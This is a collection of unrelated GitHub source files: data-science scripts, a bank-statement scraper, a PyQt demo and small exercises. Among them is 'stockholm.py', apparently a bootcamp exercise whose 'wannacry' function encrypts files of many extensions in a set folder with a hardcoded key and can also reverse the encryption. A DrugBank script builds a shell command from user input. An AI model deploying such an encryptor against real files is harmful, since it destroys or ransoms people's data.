kofikorang12/alx-higher_level_programming
0x04-python-more_data_structures/12-roman_to_int.py
12-roman_to_int.py
py
574
python
tr
code
0
github-code
36
29647730897
import os import sys import subprocess BASE_PATH = os.getcwd() #python folder def drugbank_search(query): content = [] os.chdir("./../java_lucene_index") #process = subprocess.Popen(['ls'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) process = subprocess.Popen("./launch.sh drugbank "+query, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() stdout = stdout.decode("utf-8") stderr = stderr.decode("utf-8") lines = stdout.splitlines() for line in lines: table = line.split('#-#') content.append(table) os.chdir(BASE_PATH) return content def main(): #default query query = "\"id : DB0000*\"" argc = len(sys.argv) if (argc > 1): query = sys.argv[1] query = f'"{query}"' content = drugbank_search(query) n = len(content) print(f"result : {n}") if (n>0): elem = content[0] print(f"id : {elem[0]}") print(f"name : {elem[1]}") print(f"description : {elem[2]}") print(f"indication : {elem[3]}") print(f"toxicity : {elem[4]}") print(f"synonyms : {elem[5]}") print(f"atc_code : {elem[6]}") if __name__ == '__main__': main()
Hamza-ABDOULHOUSSEN/gmd2k22
python/drugbank/drugbank_index_query.py
drugbank_index_query.py
py
1,259
python
en
code
0
github-code
36
42215123133
import json import os import datetime import scipy.optimize import sklearn.metrics import aop import aop.api class DailyIndexPrediction: def __init__(self): # read the config.json in the current directory with open(os.path.dirname(__file__) + '/config.json', 'r') as file_obj: self.config = json.load(file_obj) # set gateway domain name aop.set_default_server('gateway.open.umeng.com') # set apiKey and apiSecurity aop.set_default_appinfo(self.config['api_key'], self.config['api_security']) self.factor = 54 self.dnu = list() self.retention = list() self._set_dnu_data() self._set_retention_data() def _get_retention_rate(self): """support 7-days average retention at most""" # setup the start and end date of the retention request start_date = datetime.datetime.now().date() + datetime.timedelta(days=-37) end_date = datetime.datetime.now().date() # build request req = aop.api.UmengUappGetRetentionsRequest() # send api request try: resp = req.get_response(None, appkey=self.config['app_key'], startDate=str(start_date), endDate=str(end_date), periodType='daily' ) except aop.ApiError as e: print('Exception returned by API gateway:', e) except aop.AopError as e: print('Exception before client API gateway request:', e) except Exception as e: print('Other unknown exceptions:', e) # print(resp) # extract retention rate info retentions = [info['retentionRate'] for info in resp['retentionInfo']] retentions.reverse() return retentions def _build_coordinate(self, avg_days=3): retentions = self._get_retention_rate() # umeng retention days x_labels = [1, 2, 3, 4, 5, 6, 7, 14, 30] y_labels = list() for x in x_labels: tmp_lst = [] for day in range(x-1, avg_days+x-1): tmp_lst.append(retentions[day][x_labels.index(x)]) y_labels.append(sum(tmp_lst)/len(tmp_lst)) return x_labels, y_labels def _curve_fitting(self): x_labels, y_labels = self._build_coordinate() def func(x, a, b): return a * (x ** b) popt, pcov = scipy.optimize.curve_fit(func, x_labels, y_labels) # y_pred = [func(x, popt[0], popt[1]) for x in x_labels] # r2 = sklearn.metrics.r2_score(y_labels, y_pred) # print('coefficient of determination:', r2) coefficient = popt[0] exponent = popt[1] return coefficient, exponent def _set_retention_data(self): """notice: day must be greater than 0, Calculate the retention according to the formula. """ coefficient, exponent = self._curve_fitting() self.retention = [coefficient * (day ** exponent) / 100 for day in range(1, 181)] def _update_dnu(self): """update dnu""" with open(os.path.dirname(__file__) + '/dnu.json', 'r') as file_obj: dnu_data = json.load(file_obj) today = datetime.datetime.now().date() last_date = max(dnu_data.keys()) last_date = datetime.datetime.strptime(last_date, '%Y-%m-%d').date() if (today - last_date).days == 1: pass else: # update dnu start_date = last_date + datetime.timedelta(days=1) end_date = today - datetime.timedelta(days=1) # send api request req = aop.api.UmengUappGetNewAccountsRequest() try: resp = req.get_response(None, appkey=self.config['app_key'], startDate=str(start_date), endDate=str(end_date) ) except aop.ApiError as e: print('Exception returned by API gateway:', e) except aop.AopError as e: print('Exception before client API gateway request:', e) except Exception as e: print('Other unknown exceptions:', e) resp = resp['newAccountInfo'] for i in resp: dnu_data[i['date']] = i['newUser'] with open(os.path.dirname(__file__) + '/dnu.json', 'w') as file_obj: json.dump(dnu_data, file_obj, indent=8) return dnu_data def _set_dnu_data(self): dnu_data = self._update_dnu() dnu_lst = list() today = datetime.datetime.now().date() date_index = today date_index -= datetime.timedelta(days=1) for i in range(180): dnu_lst.append(dnu_data[str(date_index)]) date_index -= datetime.timedelta(days=1) self.dnu = dnu_lst def test(self, days, goal): self._set_dnu_data() self._set_retention_data() print(self.retention) print(sum(self.retention[:6])) # print(sum(self.retentions[:3])) # print(sum([i[0]*i[1] for i in zip(self.retentions[24:self.factor], self.dnu[24:self.factor])])) # r_sum = sum(self.retentions[:days-1]) + 1 # dnu_each_day = goal / r_sum # print() # print('GOAL: {} DAU in {} days.'.format(goal, days)) # print('You need on average {} new users everyday.'.format(round(dnu_each_day), days)) # print('The total number of new users in {} day[s] is {}.'.format(days, round(dnu_each_day)*days)) # print('The total customer acquisition cost of {} new users is ¥{}.'.format(round(dnu_each_day)*days, round(dnu_each_day)*days*0.65)) def dau_prediction(self, data_payload): """ { "is_avg_dnu": 1, "dnu_data": { "goal_each_day": 10000, "target_date": "2020-11-24" } } { "is_avg_dnu": 0, "dnu_data": { "2020-11-21": 5000, "2020-11-22": 6000, "2020-11-23": 7000, "2020-11-24": 8000 } } """ # average DNU if int(data_payload['is_avg_dnu']): # extract data dnu_each_day = int(data_payload['dnu_data']['goal_each_day']) target_date = data_payload['dnu_data']['target_date'] # calc timedelta target_date = datetime.datetime.strptime(target_date, '%Y-%m-%d').date() current_date = datetime.datetime.now().date() timedelta = (target_date - current_date).days # set dnu list dnu_lst = self.dnu dnu_lst[:0] = [dnu_each_day] * timedelta dnu_lst = dnu_lst[:self.factor] # set retention list retention_lst = self.retention[:self.factor] # calc ideal DAU ideal_dau = sum([x*y for x, y in zip(dnu_lst, retention_lst)]) + dnu_each_day ideal_dau = round(ideal_dau) return '{dnu} new users for today and future {timedelta} day(s), you will reach {dau} active users on {date}'.format(dnu=dnu_each_day, timedelta=timedelta, dau=ideal_dau, date=str(target_date)) # custom DNU else: # extract data dnu_data = data_payload['dnu_data'] last_date = max(dnu_data.keys()) # calc timedelta timedelta = len(dnu_data.keys()) - 1 # set dnu list dnu_lst = self.dnu dnu_lst[:0] = reversed(list(dnu_data.values())[:timedelta]) dnu_lst = dnu_lst[:self.factor] # set retention list retention_lst = self.retention[:self.factor] # calc ideal DAU ideal_dau = sum([x*y for x, y in zip(dnu_lst, retention_lst)]) + dnu_data[last_date] ideal_dau = round(ideal_dau) return 'You will reach {dau} active users on {date}'.format(dau=ideal_dau, date=last_date) def dnu_prediction(self, dau_goal=0, end_date=None): """ { "dau_goal": 20000, "target_date": "2020-11-24" } """ # calc timedelta start_date = datetime.datetime.now().date() end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').date() timedelta = (end_date - start_date).days ideal_dnu = 0 # future dau goal if timedelta >= 1: # from yesterday to past, total factor-timedelta days past_days = [x*y for x, y in zip(self.dnu, self.retention[timedelta:self.factor])] ideal_dnu = (dau_goal - sum(past_days)) / (sum(self.retention[:timedelta]) + 1) return 'You need to guarantee {} new users today and in the next {} day[s].'.format(round(ideal_dnu), timedelta) # today dau goal elif timedelta == 0: past_days = [x*y for x, y in zip(self.dnu, self.retention[:self.factor])] ideal_dnu = dau_goal - sum(past_days) return 'You need to guarantee {} new users today.'.format(round(ideal_dnu)) else: return 'Wrong Date.' # 算法, # 每运行一次就请求一次? # 45days factor自动适应 if __name__ == '__main__': predict = DailyIndexPrediction() predict.test(1, 1) # with open('predict_dau_b.json', 'r') as file_obj: # data = json.load(file_obj) # print(predict.dau_prediction(data))
Silence-2020/mt-prediction
daily_index_prediction.py
daily_index_prediction.py
py
9,807
python
en
code
0
github-code
36
30910231452
import sys from PyQt5 import uic from PyQt5.QtGui import QPainter, QColor from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QMainWindow from random import randint class MyWidget(QMainWindow): def __init__(self): super().__init__() uic.loadUi('Ui.ui', self) self.do_paint = False self.pushButton.clicked.connect(self.run) def paintEvent(self, event): if self.do_paint is True: qp = QPainter() qp.begin(self) self.draw(qp) qp.end() def run(self): self.do_paint = True self.repaint() def draw(self, qp): qp.setBrush(QColor(237, 255, 33)) r = randint(1, 299) qp.drawEllipse(30, 120, r, r) if __name__ == '__main__': app = QApplication(sys.argv) ex = MyWidget() ex.show() sys.exit(app.exec_())
Dathator/Git-
main.py
main.py
py
870
python
en
code
0
github-code
36
14247809149
""" Author: Todd Zenger, Brandeis University The purpose of this code is to figure out how to bring the mean of two values of a large range down """ import numpy as np # Method 1: simply use variables to continuously check # Our two values x1 = 3 x2 = 555 # The number of times we add 2 n = 0 # We want this loop to run while the mean is greater than 10 while ((x1+x2+2*n)/(2+n)>10): n+=1 # If it fails, increase n by 1 print("Method 1: added {} times".format(n)) # Method 2: We can use Numpy to do much of the heavy work for us data = np.array([3,555]) while(np.mean(data)>10): data = np.append(data,2) # This sticks a value of 2 at the end of the array n_np = data.shape[0] - 2 # This finds the length and we take out the values of 3 and 555 print("Method 2: added {} times".format(n_np)) """ Discussion: Does this fit expected results mathematically? We solve with the definition of the mean: (3+555+2*N)/(N+2) <= 10 Solving this gives N as 67.25. When we round up, this gives 68, which is exactly what we we got. """
ToddZenger/PHYS19a
challenge/challenge-00-02.py
challenge-00-02.py
py
1,043
python
en
code
1
github-code
36
39276214746
import numpy as np import tensorflow as tf class TFModel(object): # Define and initialize the TensorFlow model, its weights, initialize session and saver def __init__(self, shape, learning_rate, alpha, regularization_rate, implicit, loss, log_weights, fit_intercepts, optimizer, random_state=None): self.shape = shape self.learning_rate = learning_rate self.alpha = alpha self.regularization_rate = regularization_rate self.implicit = implicit self.loss = loss self.log_weights = log_weights self.fit_intercepts = fit_intercepts self.optimizer = optimizer self.random_state = random_state tf.set_random_seed(self.random_state) self._init_model_and_session() def _init_model_and_session(self): # the R (n, k) matrix is factorized to P (n, d) and Q (k, d) matrices n, k, d = self.shape self.graph = tf.Graph() with self.graph.as_default(): with tf.name_scope('constants'): alpha = tf.constant(self.alpha, dtype=tf.float32) regularization_rate = tf.constant(self.regularization_rate, dtype=tf.float32, name='regularization_rate') with tf.name_scope('inputs'): self.row_ids = tf.placeholder(tf.int32, shape=[None], name='row_ids') self.col_ids = tf.placeholder(tf.int32, shape=[None], name='col_ids') self.values = tf.placeholder(tf.float32, shape=[None], name='values') if self.implicit: # D[i,j] = 1 if R[i,j] > 0 else 0 targets = tf.clip_by_value(self.values, 0, 1, name='targets') if self.log_weights: data_weights = tf.add(1.0, alpha * tf.log1p(self.values), name='data_weights') else: data_weights = tf.add(1.0, alpha * self.values, name='data_weights') else: targets = tf.identity(self.values, name='targets') data_weights = tf.constant(1.0, name='data_weights') with tf.name_scope('parameters'): if self.fit_intercepts: # b0 self.global_bias = tf.get_variable('global_bias', shape=[], dtype=tf.float32, initializer=tf.zeros_initializer()) # bi self.row_biases = tf.get_variable('row_biases', shape=[n], dtype=tf.float32, initializer=tf.zeros_initializer()) # bj self.col_biases = tf.get_variable('col_biases', shape=[k], dtype=tf.float32, initializer=tf.zeros_initializer()) # P (n, d) matrix self.row_weights = tf.get_variable('row_weights', shape=[n, d], dtype=tf.float32, initializer = tf.random_normal_initializer(mean=0, stddev=0.01)) # Q (k, d) matrix self.col_weights = tf.get_variable('col_weights', shape=[k, d], dtype=tf.float32, initializer = tf.random_normal_initializer(mean=0, stddev=0.01)) with tf.name_scope('prediction'): if self.fit_intercepts: batch_row_biases = tf.nn.embedding_lookup(self.row_biases, self.row_ids, name='row_bias') batch_col_biases = tf.nn.embedding_lookup(self.col_biases, self.col_ids, name='col_bias') batch_row_weights = tf.nn.embedding_lookup(self.row_weights, self.row_ids, name='row_weights') batch_col_weights = tf.nn.embedding_lookup(self.col_weights, self.col_ids, name='col_weights') # P[i,:] * Q[j,:] weights = tf.reduce_sum(tf.multiply(batch_row_weights, batch_col_weights), axis=1, name='weights') if self.fit_intercepts: biases = tf.add(batch_row_biases, batch_col_biases) biases = tf.add(self.global_bias, biases, name='biases') linear_predictor = tf.add(biases, weights, name='linear_predictor') else: linear_predictor = tf.identity(weights, name='linear_predictor') if self.loss == 'logistic': self.pred = tf.sigmoid(linear_predictor, name='predictions') else: self.pred = tf.identity(linear_predictor, name='predictions') with tf.name_scope('loss'): l2_weights = tf.add(tf.nn.l2_loss(self.row_weights), tf.nn.l2_loss(self.col_weights), name='l2_weights') if self.fit_intercepts: l2_biases = tf.add(tf.nn.l2_loss(batch_row_biases), tf.nn.l2_loss(batch_col_biases), name='l2_biases') l2_term = tf.add(l2_weights, l2_biases) else: l2_term = l2_weights l2_term = tf.multiply(regularization_rate, l2_term, name='regularization') if self.loss == 'logistic': loss_raw = tf.losses.log_loss(predictions=self.pred, labels=targets, weights=data_weights) else: loss_raw = tf.losses.mean_squared_error(predictions=self.pred, labels=targets, weights=data_weights) self.cost = tf.add(loss_raw, l2_term, name='loss') if self.optimizer == 'Ftrl': self.train_step = tf.train.FtrlOptimizer(self.learning_rate).minimize(self.cost) else: self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.cost) self.saver = tf.train.Saver() init = tf.global_variables_initializer() # initialize TF session self.sess = tf.Session(graph=self.graph) self.sess.run(init) def train(self, rows, cols, values): batch = { self.row_ids : rows, self.col_ids : cols, self.values : values } _, loss_value = self.sess.run(fetches=[self.train_step, self.cost], feed_dict=batch) return loss_value def predict(self, rows, cols): batch = { self.row_ids : rows, self.col_ids : cols } return self.pred.eval(feed_dict=batch, session=self.sess) def coef(self): if self.fit_intercepts: return self.sess.run(fetches={ 'global_bias' : self.global_bias, 'row_bias' : self.row_biases, 'col_bias' : self.col_biases, 'row_weights' : self.row_weights, 'col_weights' : self.col_weights }) else: return self.sess.run(fetches={ 'row_weights' : self.row_weights, 'col_weights' : self.col_weights }) def save(self, path): self.saver.save(self.sess, path) def restore(self, path): self.saver.restore(self.sess, path)
twolodzko/tfmf
tfmf/tf_model.py
tf_model.py
py
7,146
python
en
code
9
github-code
36
74469828583
#! /usr/bin/env python3 import logging import os import tempfile log = logging.getLogger(__name__) def download_to_disk(config, object_ref): log.debug('Moving file from {} to temporary file'.format(object_ref)) fd, path = tempfile.mkstemp(os.path.splitext(object_ref)[-1]) os.write(fd, open(object_ref, 'rb').read()) os.close(fd) return path
mabruras/sqapi
src/sqapi/query/content/disk.py
disk.py
py
367
python
en
code
2
github-code
36
8786926229
from .abstract import Aggregator from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import Select from bs4 import BeautifulSoup from accagg.browser import Browser from time import sleep import re from datetime import date class Aggregator(Aggregator): @classmethod def bankid(self): return self.__module__.split('.')[-1] @classmethod def description(self): return "SBI Sumishin Net Bank" @classmethod def login_info(self): return {'USRID': 'ID', 'PASSWORD': '暗証番号'} def __decode_date(self, str): match = re.match(r"^(\d+)年(\d+)月(\d+)日$", str) if match: y = int(match.group(1)) m = int(match.group(2)) d = int(match.group(3)) return date(y, m, d) def _decode_amount(self, str): if str[0] != '-': str = '0' + str return int('0' + str.replace(',', '').replace('円', '')) def wait_until_blocked(self, b): b.implicitly_wait(0) for i in range(1, 20): try: print('try:%d' % i) es = b.find_element_by_class_name('loadingServer') except NoSuchElementException: b.implicitly_wait(180) return sleep(0.5) def run(self, login_info, lastdate): URL = "https://www.netbk.co.jp" self.__lastdate = lastdate browser = Browser.firefox() browser.implicitly_wait(180) # open URL browser.get(URL) browser.wait_for_loaded() # import pdb; pdb.set_trace() # ログイン browser.find_element_by_link_text("ログイン").click() # enter browser.sync_send_keys((By.NAME, 'userName'), login_info['USRID']) browser.sync_send_keys((By.CSS_SELECTOR, 'input[type="password"]'), login_info['PASSWORD']) # Click login browser.find_element_by_css_selector('button[type="submit"]').click() browser.wait_for_title_changed() while not '住信' in browser.title: sleep(0.1) if '重要なお知らせ' in browser.title: # 確認 (次へを押す) browser.wait_element((By.LINK_TEXT, '次へ進む')).click() browser.wait_for_loaded() # ホーム result = [] # import pdb; pdb.set_trace() # 普通預金 data = self.__get_ordinary(browser) if data: result.extend(data) # 円定期預金 data = self.__get_time_deposit(browser) if data: result.extend(data) browser.quit() return result def __get_ordinary(self, browser): # import pdb; pdb.set_trace() # 入出金明細 self.wait_until_blocked(browser) sleep(0.5) e = browser.wait_element((By.LINK_TEXT, "入出金明細")) browser.execute_script('arguments[0].click();', e) self.wait_until_blocked(browser) # 口座名取得 browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]')) num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li')) result = [] for i in range(0, num): e = browser.find_element_by_css_selector('[nblabel="口座名"]') e.click() e = e.find_elements_by_css_selector('li')[i] subname = e.text e.click() name = 'ordinary' if i > 0: name = name + '_' + subname result.append({ 'name': name, 'unit': 'Yen', 'account': '普通', 'history': self.__get_ordinary_sub(browser), }) # print(result) # ホームへ戻る self.wait_until_blocked(browser) browser.find_element_by_link_text('ホーム').click() # wait for display browser.wait_for_title_changed() browser.wait_for_loaded() browser.wait_element((By.LINK_TEXT, 'サイトマップ')) return result def __get_ordinary_sub(self, browser): browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click() browser.find_element_by_xpath('//label[contains(text(),"期間指定")]').click() e = browser.find_elements_by_css_selector('.m-formSelectDate')[0] e.find_element_by_css_selector('p.m-select-year nb-simple-select').click() e.find_elements_by_css_selector('p.m-select-year li')[1].click() e.find_element_by_css_selector('p.m-select-month nb-simple-select').click() e.find_elements_by_css_selector('p.m-select-month li')[1].click() e.find_element_by_css_selector('p.m-select-day nb-simple-select').click() e.find_elements_by_css_selector('p.m-select-day li')[1].click() # 表示 browser.find_elements_by_link_text('表示')[1].click() # wait for update browser.find_elements_by_partial_link_text('明細ダウンロード') data = [] # import pdb; pdb.set_trace() while True: soup = BeautifulSoup(browser.page_source, "html.parser") for row in soup.select('.m-tblDetailsBox'): date = self.__decode_date(row.select('.m-date')[0].string) if self.__lastdate > date: return data desc = row.select('.m-subject span')[0].string deposit = self._decode_amount(row.select('.m-txtEx')[0].string) if row.select('.m-sign')[0].string == '出': deposit = -deposit balance = self._decode_amount(row.select('.m-txtEx')[1].string) item = {'date' : date, 'price': 1, 'amount' : deposit, 'payout' : deposit, 'desc' : desc, 'balance' : balance } # print(item) # Prepend. # Detail list is sorted by descending order # Passbook order is ascending data.insert(0, item) # 次へリンクがあるかチェック browser.implicitly_wait(0) es = 0 try: es = browser.find_element_by_css_selector('.m-pager-prev') # print(es.get_attribute('outerHTML')) except NoSuchElementException: # print("no entry") break if not es: break browser.implicitly_wait(180) next_page = es.text es.click() # wait for update while browser.find_element_by_class_name('m-counter').text.split(' ')[0] != next_page: sleep(0.1) return data def __get_time_deposit(self, browser): # import pdb; pdb.set_trace() browser.implicitly_wait(0) es = 0 try: es = browser.find_element_by_link_text('円預金・仕組預金') except NoSuchElementException: print("no entry") return None browser.implicitly_wait(180) es.click() sleep(0.5) # 円定期預金 browser.find_element_by_link_text('円定期預金').click() # 取引履歴 browser.find_element_by_link_text('取引履歴').click() # 口座名取得 # browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]')) num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li')) result = [] for i in range(0, num): # 口座切り替え browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click() e = browser.find_element_by_css_selector('[nblabel="口座名"]') e.click() e = e.find_elements_by_css_selector('li')[i] subname = e.text e.click() # 並び順 # e = browser.find_element_by_css_selector('[nblabel="並び順"]') # e.click() # e = e.find_elements_by_css_selector('li')[1] # e.click() # browser.find_element_by_partial_link_text('表示').click() # 更新待ち browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')) name = 'time_deposit' if i > 0: name = name + '_' + subname result.append({ 'name': name, 'unit': 'Yen', 'account': '普通', 'history': self.__get_time_deposit_sub(browser), }) # print(result) # ホームへ戻る browser.find_element_by_link_text('ホーム').click() # wait for display browser.wait_for_title_changed() browser.wait_for_loaded() browser.wait_element((By.LINK_TEXT, 'サイトマップ')) return result def __get_time_deposit_sub(self, browser): data = [] balance = 0 # ページ数取得 num = browser.find_element_by_css_selector('p.m-counter').text num = int(num.split(' ')[2]) for i in range(1, num + 1): if i != 1: # ページ遷移 browser.find_element_by_link_text(str(i)).click() self.wait_until_blocked(browser) soup = BeautifulSoup(browser.page_source, "html.parser") for row in soup.select('tr'): c = [x for x in row.select('th p')[0].stripped_strings] date = self.__decode_date(c[0]) # if self.__lastdate > date: # break desc = ' '.join(c[1:]) c = [x for x in row.select('td .m-txtEx')[0].stripped_strings] deposit = self._decode_amount(c[1]) if c[0] == '出': deposit = -deposit balance += deposit item = {'date' : date, 'price': 1, 'amount' : deposit, 'payout' : deposit, 'desc' : desc, 'balance' : balance } # print(item) data.append(item) return data
t-bucchi/accagg
accagg/bank/sbinetbank.py
sbinetbank.py
py
10,622
python
en
code
0
github-code
36
21821135553
# F*ck implementation problems # Ab to kaam hoja bsdk # Adding comments so it might be helpful to someone ## Moral: Don't watch IPL during contest from collections import Counter for _ in range(int(input())): n = int(input()) lis = list(map(int, input().split())) ## Check for NO condition counter = Counter(lis) if len(counter) <= 1: print("NO") continue print("YES") oneWala = [1] # Every index a[0]!=a[idx] othersWala = [] # if equals then it cannot be in oneWala for i in range(1, n): if lis[i] != lis[0]: oneWala.append(i + 1) else: othersWala.append(i + 1) ## We need to have atleast one edge from oneWala to othersWala ## So check diff element in oneWala to connect to othersWala element flag = 0 idx = -1 for i in oneWala: for j in othersWala: if lis[i - 1] != lis[j - 1]: idx = i-1 flag = 1 break if flag: break ## Now connect everything in oneWala to 1 for i in oneWala: if i != 1: print(1, i) if len(othersWala) == 0: continue ## Now connect everything in othersWala to othersWala[0] for i in othersWala: print(idx + 1, i)
sainad2222/my_cp_codes
codeforces/1433/D.py
D.py
py
1,155
python
en
code
0
github-code
36
44638762028
# **************************************************************************** # # # # ::: :::::::: # # stockholm.py :+: :+: :+: # # +:+ +:+ +:+ # # By: mariza <mariza@student.42.fr> +#+ +:+ +#+ # # +#+#+#+#+#+ +#+ # # Created: 2023/05/10 09:46:33 by mariza #+# #+# # # Updated: 2023/05/30 09:56:06 by mariza ### ########.fr # # # # **************************************************************************** # import argparse import os import os.path from cryptography.fernet import Fernet RUTA = '/Users/mariza/Desktop/repo-terminados-bootcamp/stockholm/home/infection' KEY = 'PyMEtpcBTPNHI7y_wlN1dHK_K_NElzbGeYT92ksziJo=' parser = argparse.ArgumentParser() parser.add_argument ('-v', '--version', dest = 'v', action = 'store_true', help = 'muestra la version del programa') parser.add_argument ('-r', '--reverse', dest = 'r', type = str , help = 'revierte la infeccion') parser.add_argument ('-s', '--silent', dest = 's', action = "store_true", help = 'hace la infeccion sin hacer ningun output') parser.add_argument ('-f', type = str, default = RUTA, help = 'manda los archivos a una carpeta especifica') args = parser.parse_args() def new_ext(ruta): ##añadiendo la extension del archivo a .ft ext = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt", ".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods", ".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp", ".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay", ".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb", ".mdb", ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd", ".mdf", ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h", ".asm", ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl", ".dip", ".dch", ".sch", ".brd", ".jsp", ".php", ".asp", ".rb", ".java", ".jar", ".class", ".sh", ".mp3", ".wav", ".swf", ".fla", ".wmv", ".mpg", ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4", ".3gp", ".mkv", ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u", ".djvu", ".svg", ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm", ".raw", ".gif", ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso", ".backup", ".zip", ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak", ".tbk", ".bz2", ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk", ".vdi", ".sldm", ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt", ".onetoc2", ".dwg", ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv", ".txt", ".vsdx", ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst", ".potm", ".potx", ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm", ".pptx", ".ppt", ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw", ".xlsb", ".xlsm", ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm", ".docb", ".docx", ".doc") for x in os.listdir(ruta): ruta_archivo = os.path.join(ruta, x) if os.path.isfile(ruta_archivo) and os.path.splitext(x)[1] in ext: nueva_extension = x + '.ft' nueva_ruta_del_archivo = os.path.join(ruta, nueva_extension) os.rename(ruta_archivo, nueva_ruta_del_archivo) ##encripto los archivos de la carpetab def wannacry(silent=False): fernet = Fernet(KEY) ext = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt", ".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods", ".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp", ".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay", ".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb", ".mdb", ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd", ".mdf", ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h", ".asm", ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl", ".dip", ".dch", ".sch", ".brd", ".jsp", ".php", ".asp", ".rb", ".java", ".jar", ".class", ".sh", ".mp3", ".wav", ".swf", ".fla", ".wmv", ".mpg", ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4", ".3gp", ".mkv", ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u", ".djvu", ".svg", ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm", ".raw", ".gif", ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso", ".backup", ".zip", ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak", ".tbk", ".bz2", ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk", ".vdi", ".sldm", ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt", ".onetoc2", ".dwg", ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv", ".txt", ".vsdx", ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst", ".potm", ".potx", ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm", ".pptx", ".ppt", ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw", ".xlsb", ".xlsm", ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm", ".docb", ".docx", ".doc") try: for x in os.listdir(RUTA): name_archivo, ext_archivo = os.path.splitext(x) with open(os.path.join(RUTA, x), 'rb') as f: datos = f.read() if os.path.splitext(x)[1] in ext: archivo_encriptado = fernet.encrypt(datos) with open(os.path.join(RUTA, name_archivo + ext_archivo), 'wb') as f: f.write(archivo_encriptado) if not silent: print(f'El archivo {x} ha sido encriptado') except: print('La carpeta home no exite.') # new_ext(RUTA) ##desencripto los archivos de la carpeta que tengan la extension .ft def desencriptado_archivos(key, file, silent=False): try: if not os.path.exists(file): os.makedirs(file) fernet = Fernet(key) for x in os.listdir(RUTA): if x.endswith('.ft'): archivo = os.path.join(RUTA, x) with open(archivo, 'rb') as f: datos_archivo = f.read() descifrado = fernet.decrypt(datos_archivo) with open(os.path.splitext(os.path.join(file, x))[0], 'wb') as f: f.write(descifrado) if not silent: print(f'El archivo {x} ha sido desencriptado') except: print('La clave introducida no es válida') if __name__ == '__main__': if args.r: desencriptado_archivos(args.r, args.f, args.s) elif args.v: print('version 1.0') else: wannacry(args.s)
Mankestark/Proyectos-terminados-bootcamp-ciberseguridad
stockholm/stockholm.py
stockholm.py
py
7,398
python
uk
code
0
github-code
36
22192834373
def convert_to_binary(tmp): flag = False s = '' while not flag: if tmp < 2: s += str(tmp) flag = True else: s += str(tmp % 2) tmp = int(tmp / 2) print(f'Овтет: {s[::-1]}') def start_task(): print('\nЗадача 4: Перевод в двоичную\n' + 'Напишите программу, которая будет '+ 'преобразовывать десятичное число в двоичное.') tmp = int(input('Введите число: ')) convert_to_binary(tmp) start_task()
Minions-Wave/GB-Minions-Wave
The Big Brain Solutions/Personal Zone/NighTramp Solutions/Blok 2/Python/HomeWork/Seminar003/task_4.py
task_4.py
py
611
python
ru
code
2
github-code
36
26281206663
